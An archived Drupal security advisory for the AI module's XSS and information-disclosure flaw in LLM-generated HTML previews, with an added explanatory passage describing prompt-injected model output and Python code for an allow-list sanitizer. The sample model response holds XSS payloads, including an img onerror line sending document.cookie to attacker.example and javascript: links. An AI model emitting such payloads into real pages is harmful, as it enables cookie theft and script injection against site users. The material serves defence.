it-securitynotifies - [IT-SecNots] [Security-news] AI (Artificial Intelligence) - Moderately critical - Information Disclosure / Cross-site Scripting - SA-CONTRIB-2026-054

it-securitynotifies AT lists.piratenpartei.de

Subject: security announcements

List archive

  • From: security-news AT drupal.org
  • To: security-news AT drupal.org
  • Subject: [IT-SecNots] [Security-news] AI (Artificial Intelligence) - Moderately critical - Information Disclosure / Cross-site Scripting - SA-CONTRIB-2026-054
  • Date: Wed, 24 Jun 2026 18:36:55 +0000
  • List-id: <security-news.drupal.org>

View online: https://www.drupal.org/sa-contrib-2026-054

Project: AI (Artificial Intelligence) [1]
Date: 2026-June-24
Security risk: *Moderately critical* 14 ∕ 25
AC:Complex/A:None/CI:Some/II:Some/E:Theoretical/TD:Default [2]
Vulnerability: Information Disclosure / Cross-site Scripting

Affected versions: <1.2.17 || >=1.3.0 <1.3.8 || >=1.4.0 <1.4.3
CVE IDs: CVE-2026-13234
Description: 
The module and certain submodules (AI Automators, AI Translate, AI API
Explorer, AI Content Suggestions) provide the ability to use an LLM to
generate HTML or Markdown and preview it in a browser.

Under certain circumstances, rendering this HTML can lead to Cross-Site
Scripting, or to exposure of secret communications in the context of the LLM
request.

This vulnerability is mitigated by the fact that an attacker must be able to
inject text into prompts to create an attack.
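The pattern the advisory describes is generic: text an attacker has placed in a prompt (a page sent for translation, a document handed to an automator) is reproduced by the model as markup, and the preview renders that markup as trusted HTML. The example below is added here and is not code from the AI module or from Drupal; it shows the vulnerable pattern (model output passed through unchanged) next to a hardened preview that re-serialises only an allow-list of tags and attributes and rejects non-http(s) link schemes, run over a constructed model response carrying an injected payload. The allow-list, the function names and the sample response are all assumptions for the illustration. In a Drupal module the equivalent is to run the string through core's `Xss::filter()` or a text format rather than wrapping it in `Markup::create()`; the advisory does not say how the module's own fix was implemented, and sanitisation addresses only the XSS half, not the leakage of material from the LLM request.

```python
"""Added example (not code from the AI module or Drupal): allow-list
sanitising of LLM-generated HTML before it is previewed in a browser.
Allow-list, function names and the sample response are constructed."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allow-list: enough for a content preview, no scripting surface.
ALLOWED_TAGS = {"p", "br", "strong", "em", "ul", "ol", "li",
                "h1", "h2", "h3", "a", "code", "pre", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}    # no style=, no on*= anywhere
SAFE_SCHEMES = {"http", "https", "mailto"}  # blocks javascript:, data:, vbscript:
VOID_TAGS = {"br"}
DROP_CONTENT_TAGS = {"script", "style"}     # the tag *and* its text are discarded

# Constructed sample: a model response after attacker-controlled input told the
# model to reproduce markup verbatim. This is what an unsafe preview renders.
LLM_RESPONSE = (
    "<h2>Summary</h2><p>The report is <strong>positive</strong>.</p>"
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
    "<script>alert(document.domain)</script>"
    '<a href="javascript:alert(1)">details</a>'
    '<a href="&#106;avascript:alert(2)">more</a>'   # entity-encoded scheme
    '<p style="display:none">hidden text</p>'
)


def unsafe_preview(fragment: str) -> str:
    """The vulnerable pattern: model output is treated as trusted markup."""
    return fragment


def _safe_url(value):
    """Reject schemes outside SAFE_SCHEMES. Tabs/newlines are removed first
    because browsers ignore them inside a scheme ('java<TAB>script:' runs)."""
    if value is None:
        return False
    cleaned = re.sub(r"[\t\n\r]", "", value).strip()
    scheme = urlparse(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class AllowListSanitizer(HTMLParser):
    """Re-serialises only allow-listed tags/attributes; other tags are dropped
    and all text is escaped, so no active content survives."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # stack, so the output is always well-formed
        self.skip_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                      # tag dropped; its text is still emitted
        allowed = ALLOWED_ATTRS.get(tag, set())
        rendered = []
        for name, value in attrs:       # HTMLParser has already decoded entities
            if name not in allowed:
                continue                # drops onerror=, style=, srcdoc=, ...
            if name == "href" and not _safe_url(value):
                continue
            rendered.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(rendered)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:           # close intervening unclosed tags too
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass                            # comments (incl. conditional) are dropped

    def result(self) -> str:
        self.close()
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_llm_html(fragment: str) -> str:
    """The hardened preview: same input, only inert markup comes out."""
    s = AllowListSanitizer()
    s.feed(fragment)
    return s.result()


if __name__ == "__main__":
    print("unsafe:", unsafe_preview(LLM_RESPONSE))
    print("safe:  ", sanitize_llm_html(LLM_RESPONSE))
```

The sanitizer rebuilds the fragment rather than pattern-matching for `<script>`, which is why the entity-encoded `&#106;avascript:` link and the `onerror` handler on a non-allow-listed `<img>` both disappear without special cases. Sanitising Markdown output is the same problem one step later: render the Markdown first, then run the resulting HTML through the allow-list, since most Markdown renderers pass raw HTML through untouched.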

Solution: 
Install the latest version:

* If you use the AI module 1.2.16, upgrade to AI 1.2.17 [3]
* If you use the AI module 1.3.7, upgrade to AI 1.3.8 [4]
* If you use the AI module 1.4.2, upgrade to AI 1.4.3 [5]

Reported By: 
* Drew Webber (mcdruid) [6] of the Drupal Security Team

Fixed By: 
* Artem Dmitriiev (a.dmitriiev) [7]
* Abhisek Mazumdar (abhisekmazumdar) [8]
* AKHIL BABU (akhil babu) [9]
* Marcus Johansson (marcus_johansson) [10]

Coordinated By: 
* Bram Driesen (bramdriesen) [11] of the Drupal Security Team
* Drew Webber (mcdruid) [12] of the Drupal Security Team
* Juraj Nemec (poker10) [13] of the Drupal Security Team

Security issue: https://git.drupalcode.org/security/3586527-ai-security/-/work_items/1 [14]
------------------------------------------------------------------------------
Contribution record [15]

[1] https://www.drupal.org/project/ai
[2] https://www.drupal.org/security-team/risk-levels
[3] https://www.drupal.org/project/ai/releases/1.2.17
[4] https://www.drupal.org/project/ai/releases/1.3.8
[5] https://www.drupal.org/project/ai/releases/1.4.3
[6] https://www.drupal.org/u/mcdruid
[7] https://www.drupal.org/u/admitriiev
[8] https://www.drupal.org/u/abhisekmazumdar
[9] https://www.drupal.org/u/akhil-babu
[10] https://www.drupal.org/u/marcus_johansson
[11] https://www.drupal.org/u/bramdriesen
[12] https://www.drupal.org/u/mcdruid
[13] https://www.drupal.org/u/poker10
[14] https://git.drupalcode.org/security/3586527-ai-security/-/work_items/1
[15] https://new.drupal.org/contribution-record?source_link=https%3A//www.drupal.org/node/3605496

_______________________________________________
Security-news mailing list -- security-news AT drupal.org
To unsubscribe send an email to security-news-leave AT drupal.org

Archive provided by MHonArc 2.6.19+.
